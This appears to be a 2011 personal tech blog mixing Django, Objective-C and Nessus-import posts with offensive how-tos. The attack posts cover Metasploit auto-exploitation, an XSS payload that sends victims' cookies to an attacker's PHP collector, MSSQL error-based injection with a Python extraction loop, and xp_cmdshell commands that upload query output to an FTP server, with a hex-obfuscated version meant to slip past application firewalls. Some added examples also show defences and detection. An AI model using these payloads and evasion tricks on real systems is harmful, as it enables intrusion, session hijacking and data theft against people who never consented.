Modifying one drawable when you do not want to modify another.
Tuesday, December 13, 2011
Tuesday, December 6, 2011
Monday, November 7, 2011
Saturday, November 5, 2011
Django and MySQL for Python on OSX Lion
Assuming Python and MySQL are already installed, building the MySQL-python (MySQLdb) module fails like this when mysql_config is not on the PATH:
References:
python setup.py build
sh: mysql_config: command not found
Traceback (most recent call last):
File "setup.py", line 15, in <module>
metadata, options = get_config()
File "/Users/dean/Downloads/MySQL-python-1.2.3/setup_posix.py", line 43, in get_config
libs = mysql_config("libs_r")
File "/Users/dean/Downloads/MySQL-python-1.2.3/setup_posix.py", line 24, in mysql_config
raise EnvironmentError("%s not found" % (mysql_config.path,))
EnvironmentError: mysql_config not found
If you see this error, follow these steps to resolve it:
Excerpt:
In my case, I edited the setup_posix.py thusly:
# mysql_config.path = "mysql_config"
mysql_config.path = "/usr/local/mysql-5.0.45-osx10.4-i686/bin/mysql_config"
The version-specific path above is from the excerpt; point it at the mysql_config of your own install (for the standard package that is /usr/local/mysql/bin/mysql_config).
Re-issue command:
python setup.py clean
ARCHFLAGS='-arch x86_64' python setup.py build
ARCHFLAGS='-arch x86_64' python setup.py install
sudo ln -s /usr/local/mysql/lib/ /usr/local/mysql/lib/mysql
Then test:
>>> import MySQLdb
Monday, September 26, 2011
Objective-C rightMouseDown event
Subclassing NSView, override mouseDown: so that a control-click is routed to the right mouse down handler (the one-button equivalent of a right click); ordinary clicks still go to super:
-(void) mouseDown:(NSEvent *)event {
    if (event.modifierFlags & NSControlKeyMask) {
        [self rightMouseDown:event];
        return;
    }
    [super mouseDown:event];
}
Saturday, August 27, 2011
Wednesday, August 3, 2011
Import Nessus nbe into Mysql
Discovered this post here from Michael Holstein:
The 2006 version needs a modification to work with current Nessus output; here is the whole thing, tested on BackTrack 4 (I know I'm behind). To run the script:
cat [nessus nbe file] | ./nessusimport.pl
Now, to get things set up, see below. I apologize for the current formatting:
1. Create the MySQL database and these tables:
-- ENGINE= replaces the TYPE= keyword of the original (TYPE= was removed in MySQL 5.5).
-- The '0000-00-00 00:00:00' defaults are rejected under a strict sql_mode with NO_ZERO_DATE; use NULL defaults there.
CREATE TABLE ipmain (
  idmain int(10) unsigned NOT NULL auto_increment,
  mainip int(10) unsigned NOT NULL default '0',
  lastnmap datetime NOT NULL default '0000-00-00 00:00:00',
  lastnessus datetime NOT NULL default '0000-00-00 00:00:00',
  ipowner varchar(40) default NULL,
  PRIMARY KEY (idmain),
  KEY xip (mainip)
) ENGINE=MyISAM;

CREATE TABLE nessusresults (
  idnessus int(10) unsigned NOT NULL auto_increment,
  domain varchar(15) NOT NULL default '',
  nessushost int(10) unsigned NOT NULL default '0',
  service varchar(40) NOT NULL default '',
  scriptid int(10) unsigned NOT NULL default '0',
  risk tinyint(3) unsigned NOT NULL default '0',
  timestamp datetime NOT NULL default '0000-00-00 00:00:00',
  msg text,
  PRIMARY KEY (idnessus),
  KEY xidnessus (idnessus),
  KEY knessushost (nessushost),
  KEY knessushost2 (nessushost,service)
) ENGINE=MyISAM;

CREATE TABLE nessusstats (
  idstat int(10) unsigned NOT NULL auto_increment,
  domain varchar(15) NOT NULL default '',
  nessushost int(10) unsigned NOT NULL default '0',
  service varchar(40) NOT NULL default '',
  scriptid int(10) unsigned NOT NULL default '0',
  risk tinyint(3) unsigned NOT NULL default '0',
  timestamp datetime NOT NULL default '0000-00-00 00:00:00',
  PRIMARY KEY (idstat),
  KEY xidstat (idstat),
  KEY kstat (nessushost),
  KEY kstst2 (nessushost,service)
) ENGINE=MyISAM;
----------------------
2. Create the following perl script:
#!/usr/bin/perl
# Import a Nessus .nbe report into MySQL. Based on Michael Holstein's 2006
# script, with the "Risk factor" matching updated for newer Nessus output.
# Usage: cat scan.nbe | ./nessusimport.pl
use strict;
use warnings;
use Date::Manip;
use DBI ();

our $TZ = 'US/Eastern';

##### DATABASE PARAMETERS #####
my $DATABASE = "DB GOES HERE";
my $HOST     = "HOSTNAME GOES HERE";
my $USERNAME = "DB USERNAME GOES HERE";
my $PASSWORD = "DB PASSWORD GOES HERE";

# connect to the database server
# DBI->trace(1, "trace.log");   # uncomment to log all DBI activity
my $dbh = DBI->connect("DBI:mysql:database=$DATABASE;host=$HOST",
                       $USERNAME, $PASSWORD, { RaiseError => 1 })
    or die "Unable to connect: $DBI::errstr\n";

# "Risk factor" text in the message -> numeric risk (1 = high .. 3 = low).
# Newer Nessus writes the factor after a literal "\n\n" in the nbe message,
# which is why these patterns match a backslash-n pair, not a real newline.
my @RISK_MAP = (
    [ qr/Risk factor :\\n\\nCritical/, 1 ],
    [ qr/Risk factor :\\n\\nSerious/,  1 ],
    [ qr/Risk factor :\\n\\nHigh/,     1 ],
    [ qr/Risk factor :\\n\\nMedium/,   2 ],   # also matches Medium/Low
    [ qr/Risk factor :\\n\\nLow/,      3 ],   # also matches Low/Medium
);

##### MAIN PROGRAM LOOP #####
# nbe records are pipe-delimited:
#   results|domain|host|service|scriptid|risk|msg|
#   timestamps||host|host_start|date|        (likewise host_end)
while (<>) {
    chomp;
    my @results = split /\|/;
    next unless @results >= 5;
    for my $i (0 .. 6) { $results[$i] = '' unless defined $results[$i]; }

    $results[6] =~ tr/;/\n/;   # nbe separates message lines with ';'
    $results[6] =~ tr/"/'/;

    $results[5] = 7;           # 7 = unrated; only rated records are stored
    for my $r (@RISK_MAP) {
        if ($results[6] =~ $r->[0]) { $results[5] = $r->[1]; last; }
    }

    for (@results) { s/^\s+//; s/\s+$//; }

    my $ip = dot2dec($results[2]);
    next unless $ip > 0;

    # condition 1: entry is a timestamp for start/end of a host scan
    if ($results[0] eq 'timestamps' && $results[3] =~ /host_end|host_start/) {
        my $timestamp = UnixDate($results[4], '%Y-%m-%d %H:%M:%S');
        updatemainip($ip, $timestamp);
    }
    # condition 2: entry is a result record with a recognised risk factor
    elsif ($results[0] eq 'results' && $results[5] < 7) {
        my @nessustime = findnessustimestamp($ip);
        my $when = defined $nessustime[1] ? $nessustime[1] : '0000-00-00 00:00:00';
        updatenessus($results[1], $ip, $results[3], $results[4], $results[5], $when, $results[6]);
        updatestats( $results[1], $ip, $results[3], $results[4], $results[5], $when);
    }
}

##### GLOBAL SUBROUTINES #####
# All SQL below uses DBI placeholders; the original interpolated the fields
# into the statements and only backslash-escaped quotes in the message, so a
# crafted banner or plugin output could have broken (or injected into) the SQL.

# turn dotted quad into decimal (0 for anything that is not an IPv4 address)
sub dot2dec {
    my $address = shift;
    return 0 unless defined $address && $address =~ /^\d+\.\d+\.\d+\.\d+$/;
    my ($o1, $o2, $o3, $o4) = split /\./, $address;
    return $o4 + ($o3 * 256) + ($o2 * 256**2) + ($o1 * 256**3);
}

# turn decimal into dotted quad (not used by the import; handy for reports)
sub dec2dot {
    my $n = shift;
    return join '.', ($n >> 24) & 255, ($n >> 16) & 255, ($n >> 8) & 255, $n & 255;
}

# update/add IP + last scan timestamp in master table
sub updatemainip {
    my ($ip, $when) = @_;
    my ($idmain) = $dbh->selectrow_array('select idmain from ipmain where mainip = ?', undef, $ip);
    if ($idmain) {
        $dbh->do('update ipmain set lastnessus = ? where idmain = ?', undef, $when, $idmain);
    } else {
        $dbh->do('insert into ipmain (mainip, lastnessus) values (?, ?)', undef, $ip, $when);
    }
    return;
}

# find idmain and last nessus timestamp for an IP
sub findnessustimestamp {
    return $dbh->selectrow_array('select idmain, lastnessus from ipmain where mainip = ?', undef, $_[0]);
}

# update/add a result record in nessusresults (one row per host + scriptid)
sub updatenessus {
    my ($domain, $host, $service, $scriptid, $risk, $when, $msg) = @_;
    my ($idnessus) = $dbh->selectrow_array(
        'select idnessus from nessusresults where nessushost = ? and scriptid = ?',
        undef, $host, $scriptid);
    if ($idnessus) {
        $dbh->do('update nessusresults set domain = ?, nessushost = ?, service = ?, scriptid = ?, '
               . 'risk = ?, timestamp = ?, msg = ? where idnessus = ?',
                 undef, $domain, $host, $service, $scriptid, $risk, $when, $msg, $idnessus);
    } else {
        $dbh->do('insert into nessusresults (domain, nessushost, service, scriptid, risk, timestamp, msg) '
               . 'values (?, ?, ?, ?, ?, ?, ?)',
                 undef, $domain, $host, $service, $scriptid, $risk, $when, $msg);
    }
    return;
}

# append a stats row for every result record
sub updatestats {
    $dbh->do('insert into nessusstats (domain, nessushost, service, scriptid, risk, timestamp) '
           . 'values (?, ?, ?, ?, ?, ?)', undef, @_);
    return;
}
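The same import logic as an added Python example (not part of the original post or Michael Holstein's script): a small .nbe parser with the risk mapping of the Perl above, loading into SQLite through parameterised statements instead of interpolating fields into SQL. The sample records and the cut-down nessusresults table are constructed so the block runs offline; the plugin ids and host are illustrative.

```python
# Added example (not part of the original post or Michael Holstein's script):
# a small .nbe parser with the same risk mapping as the Perl above, loading
# into SQLite through parameterised statements instead of interpolating
# fields into SQL. SAMPLE_NBE is constructed; the table is a cut-down
# nessusresults so the block runs offline.
import re
import socket
import sqlite3
import struct
from typing import Optional

# Same order as the Perl if-chain: the first pattern that matches wins.
# Newer Nessus writes the factor after a literal backslash-n pair.
RISK_MAP = [
    (re.compile(r"Risk factor :\\n\\n(?:Critical|Serious|High)"), 1),
    (re.compile(r"Risk factor :\\n\\nMedium"), 2),   # also Medium/Low
    (re.compile(r"Risk factor :\\n\\nLow"), 3),      # also Low/Medium
]
UNRATED = 7   # the Perl script's "no risk factor found" value


def dot2dec(ip: str) -> int:
    """Dotted quad -> unsigned 32-bit int (what ipmain.mainip stores); 0 if invalid."""
    try:
        return struct.unpack("!I", socket.inet_aton(ip))[0]
    except OSError:
        return 0


def risk_of(msg: str) -> int:
    for rx, value in RISK_MAP:
        if rx.search(msg):
            return value
    return UNRATED


def parse_nbe_line(line: str) -> Optional[dict]:
    """Return a record for a 'results' row, None for timestamps and other rows.
    Layout: results|domain|host|service|scriptid|risk-word|msg|"""
    f = line.rstrip("\n").split("|")
    if len(f) < 7 or f[0] != "results":
        return None
    host = dot2dec(f[2].strip())
    if host == 0:
        return None
    msg = f[6].replace(";", "\n").replace('"', "'")   # nbe's line/quote encoding
    return {"domain": f[1].strip(), "host": host, "service": f[3].strip(),
            "scriptid": int(f[4]), "risk": risk_of(msg), "msg": msg.strip()}


SCHEMA = """CREATE TABLE nessusresults (
    idnessus INTEGER PRIMARY KEY AUTOINCREMENT,
    domain TEXT, nessushost INTEGER, service TEXT, scriptid INTEGER,
    risk INTEGER, msg TEXT,
    UNIQUE (nessushost, scriptid))"""


def import_nbe(lines, conn: sqlite3.Connection) -> int:
    """Upsert every rated result (one row per host+scriptid). Placeholders mean
    a quote or backslash in msg cannot break out of the statement."""
    n = 0
    for line in lines:
        rec = parse_nbe_line(line)
        if rec is None or rec["risk"] == UNRATED:
            continue
        conn.execute(
            "INSERT INTO nessusresults (domain, nessushost, service, scriptid, risk, msg) "
            "VALUES (:domain, :host, :service, :scriptid, :risk, :msg) "
            "ON CONFLICT (nessushost, scriptid) DO UPDATE SET "
            "domain = excluded.domain, service = excluded.service, "
            "risk = excluded.risk, msg = excluded.msg",
            rec)
        n += 1
    conn.commit()
    return n


# Constructed sample: two rated findings, one unrated banner, plus timestamps.
SAMPLE_NBE = [
    "timestamps|||scan_start|Tue Dec 13 10:00:00 2011|",
    "timestamps||10.0.0.5|host_start|Tue Dec 13 10:00:01 2011|",
    "results|10.0.0|10.0.0.5|ssh (22/tcp)|10881|Security Note|"
    "SSH versions : 2.0\\n\\nRisk factor :\\n\\nLow|",
    "results|10.0.0|10.0.0.5|smb (445/tcp)|34477|Security Hole|"
    "Server service RCE; it's exploitable.\\n\\nRisk factor :\\n\\nCritical|",
    "results|10.0.0|10.0.0.5|http (80/tcp)|10107|Security Note|Banner only|",
    "timestamps||10.0.0.5|host_end|Tue Dec 13 10:05:00 2011|",
]


def run_sample():
    """Import the sample twice; the second pass updates rather than duplicates."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    import_nbe(SAMPLE_NBE, conn)
    count = import_nbe(SAMPLE_NBE, conn)
    rows = conn.execute(
        "SELECT scriptid, risk FROM nessusresults ORDER BY scriptid").fetchall()
    return count, rows


if __name__ == "__main__":
    print(run_sample())   # (2, [(10881, 3), (34477, 1)])
```

The unrated banner is skipped exactly as the Perl skips risk 7, and the apostrophe in the second message goes through untouched because the driver, not string escaping, handles quoting.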
Wednesday, July 13, 2011
Exploit exception: Login Failed: The server responded with unimplemented command 0 with WordCount 0
If you see this in Metasploit (for example when running the MS08-067 module):
" Exploit exception: Login Failed: The server responded with unimplemented command 0 with WordCount 0 "
Try:
> set SMBDirect false
This switches the module from raw SMB on 445 to SMB over the NetBIOS session service, so set RPORT to 139 as well if the target only answers there.
Tuesday, July 12, 2011
Thursday, June 16, 2011
Tuesday, May 31, 2011
Wednesday, May 25, 2011
Friday, May 6, 2011
Metasploit db_autopwn (Postgres)
Step 1: Get/view active database driver.
msf exploit(psexec) > db_driver
[*] Active Driver: postgresql
[*] Available: postgresql
[*] DB Support: Enable the mysql driver with the following command:
[*] $ gem install mysql
[*] This gem requires mysqlclient headers, which can be installed on Ubuntu with:
[*] $ sudo apt-get install libmysqlclient-dev
Step 2: Connect to the local database.
msf exploit(psexec) > db_connect postgres@localhost
NOTICE: CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
NOTICE: CREATE TABLE will create implicit sequence "clients_id_seq" for serial column "clients.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "clients_pkey" for table "clients"
NOTICE: CREATE TABLE will create implicit sequence "services_id_seq" for serial column "services.id"
...
Step 3: run nmap through the database (db_nmap) to enumerate the target's services; hosts and open ports are stored in the database for the next step.
msf exploit(psexec) > db_nmap [target]
[*] Nmap: Starting Nmap 5.21 ( http://nmap.org ) at 2011-05-06 15:55 EDT
[*] Nmap: Nmap scan report for [target])
[*] Nmap: Host is up (0.021s latency).
[*] Nmap: Not shown: 995 filtered ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 25/tcp open smtp
[*] Nmap: 110/tcp open pop3
[*] Nmap: 143/tcp open imap
[*] Nmap: 443/tcp open https
[*] Nmap: 993/tcp open imaps
Step 4: auto exploit. -p selects modules by the open ports recorded in the database, -t lists the matching modules, -e launches them against every matched target, -b uses bind-shell payloads:
msf exploit(psexec) > db_autopwn -p -t -e -b
Monday, May 2, 2011
How to steal cookies via XSS
This is a proof of concept demonstrating the fundamentals of stealing cookies via XSS.
There are two parts:
1. The attacker's server that will store the stolen session cookies.
2. The vulnerable server that we will inject into to steal the session.
Part 1:
This is the collection code on the attacker's server (in PHP). The filename is "malicious.php":
<?php
// "w" truncates the file on every hit, so only the last victim's cookie is kept; use "a" to append.
$fp = fopen("/tmp/tokens.txt", "w");
fwrite($fp, $_GET['code']);
fclose($fp);
?>
As you can see, the server code takes a GET request and writes the value of its 'code' parameter to a file.
Part 2:
On a page that is vulnerable to XSS, inject the following:
<script>new Image().src='[malicious_host]/malicious.php?code='%2Bdocument.cookie</script>
or
<script>document.write('<img src="http://localhost/~dliu/malicious.php?code='%2Bdocument.cookie%2B'">')</script>
The code creates an image whose source points at our malicious server; the victim's browser fetches it, which sends document.cookie in the GET parameter "code" that the server writes out. %2B is the URL-encoded "+", the form you need when the payload is delivered in a query string; in a POST body or a stored field it is a plain "+". Two caveats: the cookie string is appended unencoded, so a "&" in a cookie value truncates it (wrap it in encodeURIComponent() to be safe), and cookies set with the HttpOnly flag are not visible to document.cookie and will not show up in the file.
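Both halves of the PoC above as an added Python example (not code from the original post), written as plain functions so the reflection, the collection and the HttpOnly caveat can be run offline. The page template, the cookie names, the host attacker.example and the request line are constructed.

```python
# Added example (not code from the original post): the two sides of the
# cookie-theft PoC above, as plain functions so they can be run offline.
# The page template, the cookie names and the request line are constructed.
import html
from urllib.parse import parse_qs, quote, urlsplit

# The injected payload from the post; attacker.example stands in for [malicious_host].
PAYLOAD = ("<script>new Image().src='http://attacker.example/malicious.php?code='"
           "+document.cookie</script>")


def render_search_vulnerable(q: str) -> str:
    """Reflects the parameter straight into the page: the <script> executes."""
    return "<p>Results for: " + q + "</p>"


def render_search_safe(q: str) -> str:
    """Same page with output encoding: the payload is shown as text, not run."""
    return "<p>Results for: " + html.escape(q, quote=True) + "</p>"


def readable_cookies(cookies: dict) -> str:
    """What document.cookie returns. cookies maps name -> (value, httponly);
    HttpOnly cookies are never visible to script, so they cannot be stolen this way."""
    return "; ".join(f"{name}={value}"
                     for name, (value, httponly) in cookies.items() if not httponly)


def collector_extract(request_line: str) -> str:
    """What malicious.php does with the image request: pull the 'code' parameter."""
    path = request_line.split(" ")[1]
    return parse_qs(urlsplit(path).query).get("code", [""])[0]


def set_cookie_header(name: str, value: str, httponly: bool = True,
                      secure: bool = True) -> str:
    """The defensive side: flags that keep the session cookie out of reach."""
    flags = ["HttpOnly" if httponly else "", "Secure" if secure else "", "SameSite=Lax"]
    return f"Set-Cookie: {name}={value}; " + "; ".join(f for f in flags if f)


if __name__ == "__main__":
    victim = {"PHPSESSID": ("abc123", False), "theme": ("dark", False)}
    leaked = readable_cookies(victim)                 # what the payload sends
    print(collector_extract(f"GET /malicious.php?code={quote(leaked)} HTTP/1.1"))
    print(render_search_safe(PAYLOAD))                # payload rendered inert
```

Mark the session cookie HttpOnly in readable_cookies() and the collector receives nothing useful, which is the cheapest fix to pair with output encoding.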
Monday, April 11, 2011
Thursday, April 7, 2011
Clear NSUserDefaults
The following will clear all saved preferences:
[[NSUserDefaults standardUserDefaults] setPersistentDomain:[NSDictionary dictionary] forName:[[NSBundle mainBundle] bundleIdentifier]];
Monday, April 4, 2011
MS-SQL Injection through errors
The following is a very rough draft outline; I will fill in the details at a later date:
sqlmap (also shipped with BackTrack) uses payloads similar to the following to generate MSSQL errors. I've found that at times sqlmap will fail for my needs, so knowing how to perform the injection manually helps.
For example, we know the following form is vulnerable to SQL injection because this time-based payload delays the response by nine seconds:
1);WAITFOR DELAY '0:0:9'--
We can proceed with the following error-based technique to extract useful information. The following was devised after much testing:
) UNION SELECT 1,2,3,4,5,6,7,8 FROM DATABASE..invoice WHERE 1953=CONVERT(INT,(CHAR(58)+CHAR(108)+CHAR(117)+CHAR(121)+CHAR(58)+("+qryarg+")+CHAR(58)+CHAR(107)+CHAR(106)+CHAR(113)+CHAR(58))) AND (7022=7022)--
We use 8 columns because the unknown vulnerable query pulls 8 columns and a UNION must match that count; the number was found by reading the SQL error messages as the column count was varied. The CHAR() chains spell the markers ':luy:' and ':kjq:' (CHAR avoids quote characters in the payload), and CONVERT(INT, ...) fails on the resulting string, so the server's conversion error echoes the value, markers included, and it can be pulled out of the response with a regex. DATABASE is a placeholder for the database name.
We then substitute our qryarg with the query we are interested in:
for i in range(1,500):
    qryarg="SELECT TOP 1 name FROM (SELECT TOP "+str(i)+" name FROM master..sysdatabases ORDER BY name ASC) sq ORDER BY name DESC"
This sends one request per row and enumerates the database names: TOP i ascending in the inner query and TOP 1 descending outside returns the i-th name. Once i exceeds the number of rows the last name repeats, which is the signal to stop.
Then we enumerate table names in each database we found:
SELECT TOP 1 name FROM (SELECT TOP "+ str(i) +" name FROM DATABASE..sysobjects WHERE xtype = 'U' ORDER BY name ASC) sq ORDER BY name DESC
and so on with columns, then the actual rows.
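The extraction loop above made explicit, as an added Python example (not code from the original post): build_payload() wraps a sub-query in the same CHAR() markers, extract_value() pulls the echoed value out of the MSSQL conversion error, and enumerate_column() walks the TOP-i trick until the last row repeats instead of blindly running to 500. The HTTP transport is a callback, so the logic runs here against fake_send(), a constructed stand-in with made-up database names rather than a real target.

```python
# Added example (not code from the original post): the error-based extraction
# above made explicit. build_payload() wraps a sub-query in the same CHAR()
# markers the post uses, extract_value() pulls the echoed value out of the
# MSSQL conversion error, and enumerate_column() walks the TOP-i trick until
# the last row repeats. The HTTP transport is a callback, so the logic runs
# here against fake_send(), a constructed stand-in with made-up database names.
import re
from typing import Callable, List, Optional

# CHAR(58)+CHAR(108)+CHAR(117)+CHAR(121)+CHAR(58) -> ':luy:'
# CHAR(58)+CHAR(107)+CHAR(106)+CHAR(113)+CHAR(58) -> ':kjq:'
LEFT, RIGHT = ":luy:", ":kjq:"


def to_char_concat(s: str) -> str:
    """Spell a string as CHAR(n)+CHAR(n)+... so the payload needs no quote characters."""
    return "+".join(f"CHAR({ord(c)})" for c in s)


def build_payload(qryarg: str, columns: int = 8) -> str:
    """The post's UNION/CONVERT payload with qryarg substituted in. 'columns'
    must equal the column count of the vulnerable SELECT (8 in the post)."""
    cols = ",".join(str(i) for i in range(1, columns + 1))
    return (f") UNION SELECT {cols} FROM DATABASE..invoice WHERE 1953=CONVERT(INT,("
            f"{to_char_concat(LEFT)}+({qryarg})+{to_char_concat(RIGHT)})) AND (7022=7022)--")


_MARKED = re.compile(re.escape(LEFT) + r"(.*?)" + re.escape(RIGHT), re.S)


def extract_value(response_body: str) -> Optional[str]:
    """The marked value echoed in the conversion error, or None if no error leaked."""
    m = _MARKED.search(response_body)
    return m.group(1) if m else None


def nth_row_query(n: int, column: str, table: str, where: str = "") -> str:
    """TOP n ascending inside, TOP 1 descending outside: yields the n-th value."""
    w = f" WHERE {where}" if where else ""
    return (f"SELECT TOP 1 {column} FROM (SELECT TOP {n} {column} FROM {table}{w} "
            f"ORDER BY {column} ASC) sq ORDER BY {column} DESC")


def enumerate_column(send: Callable[[str], str], column: str, table: str,
                     where: str = "", limit: int = 500) -> List[str]:
    """One request per row. Stops when a value repeats (TOP n past the end of
    the table keeps returning the last row) or when nothing marked comes back."""
    found: List[str] = []
    for i in range(1, limit + 1):
        value = extract_value(send(build_payload(nth_row_query(i, column, table, where))))
        if value is None or value in found:
            break
        found.append(value)
    return found


# --- constructed stand-in for the vulnerable application, not a real server ---
FAKE_SYSDATABASES = sorted(["master", "tempdb", "model", "msdb", "invoice"])


def fake_send(payload: str) -> str:
    """Answers the way MSSQL would: evaluates the TOP-n trick over the fake
    table and echoes the marked string inside a conversion error."""
    m = re.search(r"SELECT TOP (\d+) name FROM master\.\.sysdatabases", payload)
    if not m:
        return "<html>no error</html>"
    n = min(int(m.group(1)), len(FAKE_SYSDATABASES))
    return (f"Conversion failed when converting the varchar value "
            f"'{LEFT}{FAKE_SYSDATABASES[n - 1]}{RIGHT}' to data type int.")


if __name__ == "__main__":
    print(enumerate_column(fake_send, "name", "master..sysdatabases"))
    # ['invoice', 'master', 'model', 'msdb', 'tempdb']
```

Against a real target, send() would be the function that submits the payload in the vulnerable form field and returns the response body; table enumeration is the same call with table="DATABASE..sysobjects" and where="xtype = 'U'".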
Wednesday, March 9, 2011
Python tricks
Small notes to myself:
chr() converts an int to a character. CHAR() is the MSSQL function with the same meaning, so when analyzing an injection payload in a Python shell you can alias it:
>>> CHAR=chr
Now the CHAR(n)+CHAR(n)+... chains from a payload can be pasted into the shell as they are and evaluate to the text they encode.
Wednesday, March 2, 2011
SQL Injection to Compromise OS
MSSQL injection example that talks to an FTP server. The following POC can be extended to download/upload and execute Metasploit payloads for backdoors and reverse TCP connections. I discovered this with a customer who was directly compromised by this very attack vector.
Requirements: the MSSQL service running with SYSTEM-level (or equivalent) privileges, an injected login allowed to run sp_configure (sysadmin), and the xp_* extended procedures not removed.
Here is the query in its entirety:
Note: Replace ftp.microsoft.com with your FTP server, and user and password with your username and password. The file passed to ftp -s: must be the same file the echo chain writes (temp\ftpcommand.txt).
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; exec master..xp_cmdshell 'mkdir temp& (echo open ftp.microsoft.com& echo user& echo password& echo binary& echo lcd temp& echo put file.txt file.txt& echo bye)>temp\ftpcommand.txt & (bcp "select name,dbid,crdate from master.dbo.sysdatabases" queryout b.txt -c -T & type b.txt& del b.txt) > temp\file.txt 2>&1 & ftp -s:temp\ftpcommand.txt & rmdir /S /Q temp';--
Break down:
Step 1: Enable xp_cmdshell, which is disabled by default from SQL Server 2005 on:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Step 2: Create temporary directory:
exec master..xp_cmdshell 'mkdir temp&
Step 3: Write the FTP command script that ftp -s: will consume in the next step:
(echo open ftp.microsoft.com& echo user& echo password& echo binary& echo lcd temp& echo put file.txt file.txt& echo bye)>temp\ftpcommand.txt &
Step 4: Query MSSQL for the list of databases with bcp, capture it in file.txt, push it to your FTP server with the script from Step 3, then clean up:
(bcp "select name,dbid,crdate from master.dbo.sysdatabases" queryout b.txt -c -T & type b.txt& del b.txt) > temp\file.txt 2>&1 & ftp -s:temp\ftpcommand.txt & rmdir /S /Q temp';--
Recap:
This command creates a temporary directory "temp", writes a preset of FTP commands that upload file.txt, runs the database-listing query through bcp and captures its output in that file, uploads the file to the FTP server via ftp -s:temp\ftpcommand.txt, and cleans up at the end (rmdir).
You can obviously expand this to upload/download backdoors to initiate reverse_tcp connections.
Additionally, some trivial obfuscation: hex-encode the whole query, store it in a variable, then pass that variable to exec to bypass primitive application firewalls that key off basic search strings such as xp_cmdshell. The hex literal below decodes to the query above:
declare @q varchar(8000) select @q = 0x455845432073705f636f6e666967757265202773686f7720616476616e636564206f7074696f6e73272c20313b5245434f4e4649475552453b455845432073705f636f6e666967757265202778705f636d647368656c6c272c20313b5245434f4e4649475552453b2065786563206d61737465722e2e78705f636d647368656c6c20276d6b6469722074656d702620286563686f206f70656e206674702e6d6963726f736f66742e636f6d26206563686f207573657226206563686f2070617373776f726426206563686f2062696e61727926206563686f206c63642074656d7026206563686f207075742066696c652e7478742066696c652e74787426206563686f20627965293e74656d705c667470636f6d6d616e642e74787420262028626370202273656c656374206e616d652c646269642c6372646174652066726f6d206d61737465722e64626f2e737973646174616261736573222071756572796f757420622e747874202d63202d542026207479706520622e747874262064656c20622e74787429203e2074656d705c66696c652e74787420323e2631202620667470202d733a74656d705c667470636f6d6d616e642e747874202620726d646972202f53202f512074656d70273b2d2d exec(@q)
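The hex-literal trick above, and what a WAF rule or query-log check needs to do to see through it, as an added Python example (not code from the original post). encode_hex() builds the declare/select/exec wrapper; normalise() decodes 0x... literals and CHAR(n)+CHAR(n) chains (the CHAR=chr note from the Python tricks post above) before flag() matches on the real text. CHAIN is a constructed, shortened version of the xp_cmdshell/ftp query, and the flag names are assumptions of this example.

```python
# Added example (not code from the original post): the hex-literal trick
# above, and the normalisation a WAF rule or query-log check needs before it
# can match on strings like xp_cmdshell. encode_hex() builds the
# declare/select/exec wrapper; normalise() decodes 0x... literals and
# CHAR(n)+CHAR(n) chains (the CHAR=chr note from the Python tricks post above)
# so flag() sees the real text. CHAIN is a constructed, shortened version of
# the xp_cmdshell/ftp query; the flag names are ours.
import re

CHAIN = ("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;"
         "EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; "
         "exec master..xp_cmdshell 'mkdir temp& (echo open ftp.microsoft.com& echo user& "
         "echo password& echo bye)>temp\\ftpcommand.txt & "
         "(bcp \"select name,dbid,crdate from master.dbo.sysdatabases\" queryout b.txt -c -T) "
         "> temp\\file.txt 2>&1 & ftp -s:temp\\ftpcommand.txt & rmdir /S /Q temp';--")


def encode_hex(tsql: str) -> str:
    """Wrap a query as the post does: declare @q, assign it as a 0x literal, exec(@q)."""
    return ("declare @q varchar(8000) select @q = 0x"
            + tsql.encode("latin-1").hex() + " exec(@q)")


_HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]{2,})")
_CHAR_CHAIN = re.compile(r"\bCHAR\(\s*\d+\s*\)(?:\s*\+\s*CHAR\(\s*\d+\s*\))*", re.I)


def normalise(sql: str) -> str:
    """Decode hex literals and CHAR() chains in place. Small numeric hex
    constants get decoded too; for detection that is an acceptable trade."""
    def _hex(m):
        try:
            return bytes.fromhex(m.group(1)).decode("latin-1")
        except ValueError:          # odd length: not a byte string, leave it
            return m.group(0)

    def _chars(m):
        return "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0)))

    return _CHAR_CHAIN.sub(_chars, _HEX_LITERAL.sub(_hex, sql))


SUSPICIOUS = [
    (re.compile(r"\bxp_cmdshell\b", re.I), "xp_cmdshell"),
    (re.compile(r"sp_configure\s*'?\s*show advanced options", re.I), "enable advanced options"),
    (re.compile(r"\bexec\s*\(\s*@\w+\s*\)", re.I), "exec of a variable"),
    (re.compile(r"\bbcp\b.*\bqueryout\b", re.I | re.S), "bcp queryout"),
    (re.compile(r"\bftp\s+-s:", re.I), "scripted ftp"),
]


def flag(sql: str) -> list:
    """Names of the patterns present once the query is normalised."""
    text = normalise(sql)
    return [name for rx, name in SUSPICIOUS if rx.search(text)]


if __name__ == "__main__":
    obfuscated = encode_hex(CHAIN)
    print("raw match:", "xp_cmdshell" in obfuscated)    # False: the string is hidden
    print("after normalise:", flag(obfuscated))
```

The "exec of a variable" hit is worth keeping on its own: legitimate code rarely builds a statement in a varchar and exec()s it, so it catches the wrapper even when the inner query is encoded some other way.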
Monday, February 28, 2011
Saturday, February 19, 2011
OSX Convert audio formats
Example of converting to .caff:
afconvert -f caff -d LEI16@44100 -c 1 [input] [output]
Friday, January 28, 2011
Thursday, January 27, 2011